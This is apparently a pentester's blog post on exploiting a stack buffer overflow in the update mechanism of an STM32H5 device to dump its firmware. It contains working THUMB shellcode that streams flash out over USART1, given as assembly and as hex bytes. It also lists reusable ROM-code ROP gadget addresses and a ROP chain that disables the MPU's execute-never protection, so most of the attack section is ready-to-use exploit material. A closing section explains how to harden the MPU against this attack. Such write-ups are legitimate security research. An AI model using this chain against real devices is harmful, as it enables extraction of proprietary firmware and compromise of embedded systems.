- The unhardened approach: a stack shellcode
- Going further: bypassing a non executable stack
- Protecting against ROP
During a pentest I found an exploitable stack-based buffer overflow in the update mechanism of an embedded system running on a STM32H5. This system lacked critical protections that will be discussed here.
This article assumes you are familiar with binary exploitation techniques.
The unhardened approach: a stack shellcode
Dropping a shellcode on the stack and jumping to it is the textbook exploitation you’ve probably seen a hundred times in CTFs. We will overflow the return address with our own and point it directly afterwards to the stack address that contains the shellcode.
There are no major hurdles here. We just need two pieces of information:
- where exactly does the overflow overwrite register
LR - what the address of the stack is
The first one is obtained by bruteforcing payloads until a crash is seen. The second one is easy if the payload is of unlimited length, just insert a NOP sled and jump to a stack address that makes sense for this system. In this case the initial range can be guessed: it has to be in the low range of the SRAM at 0x20000000 since it’s very early in the boot, that’s something that is easily bruteforced. There’s also a clean way of leaking the stack pointer which we’ll discuss later on.

The shellcode will be written in THUMB mode because the MCU is sure to be running in this mode in the early boot stages: it’s a lower-density instruction set that’s used a lot in small embedded systems. The only thing to pay attention to is to add +1 to every branch address to tell the processor to stay in THUMB mode.
The constructed payload will dump the full internal flash on USART1, which we know is routed and open. From this MCU’s datasheet, the flash starts at 0x08000000 and ends at 0x08200000. The payload will read one byte from the flash, check and wait until the USART1_ISR register is clear and then write that one byte of firmware to the USART1_TDR register. Then it loops back to reading the next byte.
Written in assembly, it looks like this:
.thumb
.syntax unified
.global start
start:
; USART1 register base
movw r2, #0x3800
movt r2, #0x4001
; flash start
movw r3, #0x0000
movt r3, #0x0800
; flash end
movw r4, #0x0000
movt r4, #0x0820
loop:
ldrb r1, [r3], #1
wait:
ldr r0, [r2, #0x1C] ; read USART1 interrupt and status register
tst r0, #0x80 ; check if USART1 is busy
beq wait
strb r1, [r2, #0x28] ; write to USART1 transmit data register
cmp r3, r4 ; check if end has been reached
bne loop
It’s compiled using a cross-compilation toolchain:
arm-none-eabi-as -mthumb -o code.o code.s
arm-none-eabi-objcopy -O binary code.o code.bin
The resulting shellcode:
43 F6 00 02 C4 F2 01 02 40 F2 00 03 C0 F6 00 03 40 F2 00 04 C0 F6 20 04 13 F8 01 1B
D0 69 10 F0 80 0F FB D0 82 F8 28 10 A3 42 F5 D1
When in doubt, Jonathan Salwan’s online disassembler can be used to verify the payload.
Going further: bypassing a non executable stack
The previous attack assumed that there were no protections on this system. The most obvious protection is to forbid execution from the stack, it’s usually called NX on x86 architectures. In ARM’s case it’s named XN for eXecute-Never and is handled by a peripheral named the Memory Protection Unit (MPU). It’s supposed to be set programmatically in the early boot stages. This MPU is described in ST’s Application Note AN4838.

If you’re following along on a development board, these are the OpenOCD commands to set it:
mww 0xE000ED98 0 # MPU_RNR: select a region to program, since it's a new one we start at 0
mww 0xE000ED9C 0x20000003 # MPU_RBAR: set the base address of the region to protect and flags
mww 0xE000EDA0 0x2007FF03 # MPU_RASR: set the region attributes and size, note that it looks like a SRAM address by pure accident
mww 0xE000ED94 0x00000005 # MPU_CTRL: enable the MPU
When this protection is set, jumping to the shellcode in SRAM will cause a MemManage fault and trigger a reset.
How to get around this protection? Historically, NX is bypassed using Return-Oriented Programming (ROP). It consists in assembling small bits of the already existing code called gadgets to create a chain that will execute arbitrary code.
The problem is that you first need a firmware dump to identify gadgets. Since the goal here is to dump the firmware we’ve got ourselves a bit of a chicken and egg problem. That’s when I got the idea to use the ROM code to ROP. The ROM code is a tiny proprietary burned-in bootloader used to flash the target. It is the same for every chip which makes it the perfect candidate for ROP. Everyone can now reuse this research!
The ROM code was dumped from a development board. Gadgets were identified using Ropper:
ropper -f /home/gquere/stm32h5/bootrom.bin -a ARMTHUMB --inst-count 2 -I 0xbf97000
I’ve selected a few for you that you can use to read and write anywhere. Of course there are many others!
0x0bf994b3 str r0, [r4]; pop {r4, pc};
0x0bf97379 ldr r0, [r4]; bx lr;
0x0bf9a927 pop {r0, r4, pc};
0x0bf99b6b pop {r0, pc};
Also of use, the UART byte-write function found after a bit of reverse-engineering: 0xbf9dfbc. Remember to increment by one when calling in THUMB mode!
Naive approach 1: dumping the firmware directly on UART
It had been a while since I last did ROP so I had pretty much forgotten everything. I naively tried to replicate the shellcode in ROP:
0x0bf9a927 pop {r0, r4, pc};
0x73 r0='s'
0x40013828 r4=USART1_RDR
0x0bf994b3 str r0, [r4]; pop {r4, pc}
0xDEADBEEF junk to pop in r4
... do that again for any number of bytes ...
This didn’t work well because the UART would hang if written to too fast. But it can be used to leak arbitrary bytes, one by one! Want to leak a stack pointer? You now have all the gadgets to do so.
Naive approach 2: calling the firmware functions
OK so the UART cannot be directly written to because it’s hard to monitor the status of said UART in ROP. Simple solution: call the ROM code function that writes to the UART since it does handle the status check before writing.
Problem 1: you can’t write loops in ROP, your program has to be a linear chain of instruction addresses. This means that for each byte you want to dump you need to write a 20-byte payload. For a 2MB internal flash that seems like quite a big payload!
Problem 2: the UART write function actually ends in bx lr and not with a pop {..}. This makes it harder to call since LR has to be set beforehand. Didn’t want to deal with that, if you want to I think you could do it using these two gadgets to build a LR sled:
0x0bf98eb5 pop {pc};
0x0bf99a2f pop.w {r1, r2, r4, lr}; bx r0;
The right approach: ROP + shellcode
The proper way to bypass XN is to write a tiny ROP chain that will disable the MPU and to then jump to a shellcode in SRAM since it will be rendered executable.
That’s very easy, all that is needed is to write 0 to MPU_CTRL at address 0xE000ED94:
0x0bf9a927 pop {r0, r4, pc};
0x0 r0
0xE000ED94
0x0bf994b3 str r0, [r4]; pop {r4, pc}
0xDEADBEEF junk to pop in r4
Then just append the shellcode and you’re done!
Protecting against ROP
What made this attack work is that we’ve used the “public” ROM code to build a ROP chain. The way to protect against this is to unmap this region when setting the MPU. This is done by defining all needed regions (that is at least code, SRAM and peripherals) and then making other regions inaccessible.
It might still be possible to exploit a fully hardened MPU under special circumstances:
- you have prior access to the firmware and can extract gadgets from it, that means you can ROP from the actual firmware
- you are able to blind ROP, it’s a known technique but I doubt it works well for embedded systems!